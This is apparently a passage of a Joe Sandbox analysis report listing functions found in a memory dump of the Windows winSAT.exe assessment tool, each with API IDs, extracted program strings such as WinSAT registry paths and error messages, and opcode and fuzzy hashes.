                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$EnabledEventExceptionOpenThrowValue$ConsoleCountCtrlCurrentDirectoryErrorFreeHandleHandlerLastLibraryMutexProcessQueryReleaseRemoveStringTickTypeUninitialize_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$ERROR: Failed to determine whether WinSAT was launched by AXE.$PrivateError2
                                                                                                                                                                                              • API String ID: 3960188384-3125428
                                                                                                                                                                                              • Opcode ID: 728d8e40d0f4406b9ea3559a291b323bb0be922139b05c57cc607470484f139b
                                                                                                                                                                                              • Instruction ID: 6e464154311c5a9a7bf6ac9847c20f1d2e655dfd6b5e6c9dfca0254eafec0c0c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 728d8e40d0f4406b9ea3559a291b323bb0be922139b05c57cc607470484f139b
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA615F60E0D64295FB60BB11F8502BAEB50BF85748FF8A035D54D027E5CEADB454C761
                                                                                                                                                                                              Function 00007FF780FA0497 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 135synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$ExceptionOpenThrowValue$ConsoleCtrlDirectoryErrorFreeHandleHandlerLastLibraryMutexQueryReleaseRemoveStringTypeUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 3961399675-777394953
                                                                                                                                                                                              • Opcode ID: 9135c9db1a2b6d53960b172eab77f18052c0b60e7182bce18ae590c39f65d04e
                                                                                                                                                                                              • Instruction ID: b834435ef0b88f755d36fca79e474af13162b58f57687ca9cc08a25529e77a0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9135c9db1a2b6d53960b172eab77f18052c0b60e7182bce18ae590c39f65d04e
                                                                                                                                                                                              • Instruction Fuzzy Hash: BE616C61E0D64295FB60BB11F8502BAEB50BF85788FF8A035D94E027E5CEADF454CB60
                                                                                                                                                                                              Function 00007FF780F9A41C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$OpenValue_time64
                                                                                                                                                                                              • String ID: Cannot write WinDeploy time to the registry$Cannot write WinDeploy time to the registry: %s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WindeployTimeDate$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 3591096235-926450086
                                                                                                                                                                                              • Opcode ID: eb380b0481e0b9ca72f693fa4b87a0b3acdeee0ae9d6702f6d7fc05f83e696da
                                                                                                                                                                                              • Instruction ID: d60fa40366a14464361b53eea158f935614819521c4c1a9d89851cc5b0501f0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: eb380b0481e0b9ca72f693fa4b87a0b3acdeee0ae9d6702f6d7fc05f83e696da
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5317032A18A8282EB50EF15F8046AAF7A0FB89750FE49131DA4E47798DF7CE445CB50
                                                                                                                                                                                              Function 00007FF780F9AD4C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 62timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Error$AddressProc$EnabledEventFileLastStatusTime$CountCurrentInitLibraryLoadOpenProcessStopStringSystemTickTraceUnicode_snprintf_s_vsnprintf_smemset
                                                                                                                                                                                              • String ID: > EMD service will be restored on exit.$> Unable to Query and/or configure EMD device: %s$CKCLStart$Modify system policies$WinSAT Kernel Logger$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1738918320-3231824540
                                                                                                                                                                                              • Opcode ID: 9b25af317ddb22b309828d377d1b26cac9c168a4a35e61f9e62361bd4d1b671b
                                                                                                                                                                                              • Instruction ID: e163b57b69901751ae1439abd5521f9ba6bea06141f7b21a3839ca0a73df2e7b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b25af317ddb22b309828d377d1b26cac9c168a4a35e61f9e62361bd4d1b671b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D314D25E1C68296F710BB20E8553F9E761FB85310FE09036D94D467E6DEBCE049CB60
                                                                                                                                                                                              Function 00007FF780FD7A04 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 50fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open$Event$File$MappingViewmemset
                                                                                                                                                                                              • String ID: WinSAT.SharedMemory$WinSAT.Status.ContinueAssessment$WinSAT.Status.Read$WinSAT.Status.Update
                                                                                                                                                                                              • API String ID: 712609572-511504883
                                                                                                                                                                                              • Opcode ID: bf5e20021f47862158a04120a7e8a9a00ad36686e76ef192dd011ef5921f672b
                                                                                                                                                                                              • Instruction ID: c71a46cac86c6935406705e42aff743ad384039fd815bac9c7dfe9a91d73e753
                                                                                                                                                                                              • Opcode Fuzzy Hash: bf5e20021f47862158a04120a7e8a9a00ad36686e76ef192dd011ef5921f672b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B210A35D08B4282EB54AB15FC187B4FBB0FF89709FE59235C84D066A0EFBDA545CA60
                                                                                                                                                                                              Function 00007FF780FC60EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 50COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: fwprintf$_vsnwprintf
                                                                                                                                                                                              • String ID: <ProgrammaticName>%ws</ProgrammaticName>$ <Value>%.$ </MetricValue>$ <MetricValue>$%ws%u%ws$f</Value>
                                                                                                                                                                                              • API String ID: 3023304194-4188047341
                                                                                                                                                                                              • Opcode ID: c388f25eb83d3127818b1145cec6eb266e51844a7b2dd275e847e87368c07379
                                                                                                                                                                                              • Instruction ID: d761bcc2c400be122369e1281a9f3f3088ebad5709eee4a9dd7ad964c7b9cf0f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c388f25eb83d3127818b1145cec6eb266e51844a7b2dd275e847e87368c07379
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87219221A18B85C6EB216B14F8412F5E760FF89B95F909231E94D03724DFBCD14ACB50
                                                                                                                                                                                              Function 00007FF780F9A698 Relevance: 17.5, APIs: 4, Strings: 6, Instructions: 45registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCreateCurrentFlushProcessTickValue_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Finalized MOOBE key$?$ERROR: could not create MOOBE reg key during finalize. error = %u$MOOBE$SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 2380191356-1338865943
                                                                                                                                                                                              • Opcode ID: 4e7d4ff34902cc6fb56b6dde4fc60689389649c15d4046e9215cd57f7fabb79a
                                                                                                                                                                                              • Instruction ID: 1504accde29386f959f67b9ee21b49fc63258a4e2ff634df2bf7808f87e79dc4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e7d4ff34902cc6fb56b6dde4fc60689389649c15d4046e9215cd57f7fabb79a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23218E72A18A8287EB10AF10E805369BBA0FB99764FE14231D64D07BA4CF7CD545CF10
                                                                                                                                                                                              Function 00007FF780FE4274 Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 43libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID: GetLocaleInfoEx$GetLogicalProcessorInformation$GetNumberFormatEx$GetPhysicallyInstalledSystemMemory$SetThreadPreferredUILanguages
                                                                                                                                                                                              • API String ID: 190572456-3523330203
                                                                                                                                                                                              • Opcode ID: 2e105e3c8e4d625950942d553d011b1ce5aee880ee32c86c57c48d5fa7cb8aa5
                                                                                                                                                                                              • Instruction ID: 6a1858c2a68bbb8a885dd648459a486a2eddf2cebb1c99a2f6bdb6857b935843
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e105e3c8e4d625950942d553d011b1ce5aee880ee32c86c57c48d5fa7cb8aa5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64114236A05F02C2EB04AF51E844074B7A0FF48F55BE99235CA0D8A758EF7CE444CB60
                                                                                                                                                                                              Function 00007FF780FABA6C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is greater than the string length
                                                                                                                                                                                              • API String ID: 1804175434-1550412204
                                                                                                                                                                                              • Opcode ID: 71ccbfb0a73185a246c9622708f1c48715a6b155ecfb1c04ce32a83dc03d91b0
                                                                                                                                                                                              • Instruction ID: 353920594f395cb8ff6bc196283d3c27ce3a9353e65e894e6d2d0675d3b05417
                                                                                                                                                                                              • Opcode Fuzzy Hash: 71ccbfb0a73185a246c9622708f1c48715a6b155ecfb1c04ce32a83dc03d91b0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5971C062B08A4691EE10EF16D4445BDA325FB94BD8FE49232CA1D077E6EF3CE556C320
                                                                                                                                                                                              Function 00007FF780FBAB38 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$ByteCharExceptionMultiThrowWide__uncaught_exceptionstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 2185001581-2182108151
                                                                                                                                                                                              • Opcode ID: d49090ff22240251b88c13ac0a0cc039a700bd66b209c79e58b28cfff2847ff0
                                                                                                                                                                                              • Instruction ID: 11b07d56de330e46a476c16fc97040b472d2066bab1feac9e3a7376904d95750
                                                                                                                                                                                              • Opcode Fuzzy Hash: d49090ff22240251b88c13ac0a0cc039a700bd66b209c79e58b28cfff2847ff0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D71B462A0CA8182EB20EB16E8503A9F760FF85BA4FA48235EB5D437D5DF7CE405C710
                                                                                                                                                                                              Function 00007FF780FCEFC8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 163threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnabledEnterEventLeaveThread_vsnwprintf_s
                                                                                                                                                                                              • String ID: base\winsat\exe\logging.cpp$can't message is too large$can't message size is invalid$error message is too large
                                                                                                                                                                                              • API String ID: 3495192508-1438449205
                                                                                                                                                                                              • Opcode ID: edc0c6ef16814baa4a118c6c29bc697aab8e79b53554ef59bdb42ca1fc7c25b7
                                                                                                                                                                                              • Instruction ID: 77dbf1a441f097c19a14c89c04d436fa6cc8af80ddfc142827fbae02e07e8f0d
                                                                                                                                                                                              • Opcode Fuzzy Hash: edc0c6ef16814baa4a118c6c29bc697aab8e79b53554ef59bdb42ca1fc7c25b7
                                                                                                                                                                                              • Instruction Fuzzy Hash: B471A432A1CB9185E720EB11E8412AEF7A0FB85760FE08235DA8D43B94DF7CE459CB50
                                                                                                                                                                                              Function 00007FF780F98790 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __uncaught_exception$CountErrorEventExceptionLastThrowTickmodf
                                                                                                                                                                                              • String ID: $WARNING: could not signal MOOBE event$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 4247973475-234416474
                                                                                                                                                                                              • Opcode ID: 7252016752db6b2e790a33a04058fae5569cc5bea63e03143a6e31d6fb33bb93
                                                                                                                                                                                              • Instruction ID: 6319b505640fed88cbfb953cc055b4b1b9d451941c2ca7a1ed42fbb3abc33f3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7252016752db6b2e790a33a04058fae5569cc5bea63e03143a6e31d6fb33bb93
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA71E732A19A4286EB10EB16D49027DB7A0FFC8B85FA4D136DA4E473A5DF3CE445CB10
                                                                                                                                                                                              Function 00007FF780FE146C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 152comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot allocate memory for a string$cannot create an IXMLDOMDocument2 document$cannot load XML data from a string$cannot set the 'preserve white space' flag
                                                                                                                                                                                              • API String ID: 542301482-4268812044
                                                                                                                                                                                              • Opcode ID: f908ae71b609c46461057d9872b15e52f061db3af23fc0ec137811ee69d188f1
                                                                                                                                                                                              • Instruction ID: c3f04d8318da516a0c1b5453fdb09b2f942be75170f62f85b0e67235d914528b
                                                                                                                                                                                              • Opcode Fuzzy Hash: f908ae71b609c46461057d9872b15e52f061db3af23fc0ec137811ee69d188f1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261823660DB4285E750EF25E840569B7A0FB85B94FA48235EE5E4BBA4CF3DE481C710
                                                                                                                                                                                              Function 00007FF780F9F9D6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ConsoleCtrlDirectoryErrorHandlerLastMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > exit value = %d.$Cleanup and exit$PrivateError2
                                                                                                                                                                                              • API String ID: 3116941231-3112339584
                                                                                                                                                                                              • Opcode ID: de8a14a2e5652ea44b424f8fc3908815600c830d42e5d1ef7934857c2ca71745
                                                                                                                                                                                              • Instruction ID: 0ffb47b7ee9c93286be2508c1dde9b7bd2197451944415c26d4219e94682c9bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: de8a14a2e5652ea44b424f8fc3908815600c830d42e5d1ef7934857c2ca71745
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56715D61E0D68295FB60BB11F8502BAEB50BF85788FF89035D54E027E6DEACF854C760
                                                                                                                                                                                              Function 00007FF780FE0F98 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145comCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                              • String ID: base\winsat\mlib\mxmldom.cpp$cannot create an IXMLDOMDocument2 document$cannot load document from file '%s'$cannot set the 'preserve white space' flag
                                                                                                                                                                                              • API String ID: 542301482-1638859044
                                                                                                                                                                                              • Opcode ID: 9b3633d7085cfaca965e46358fa46d19c17eb9bc4173e311c048481f6e785c1b
                                                                                                                                                                                              • Instruction ID: cc448c2c6813ea73eaeabb8a40b685108287214e778791ae092fa8171488b686
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b3633d7085cfaca965e46358fa46d19c17eb9bc4173e311c048481f6e785c1b
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4617332A08B82CAE710EF25E8402A9B7B4FB45B94FA48235EE4D577A4DF3DE445C710
                                                                                                                                                                                              Function 00007FF780F9F2E9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 139synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
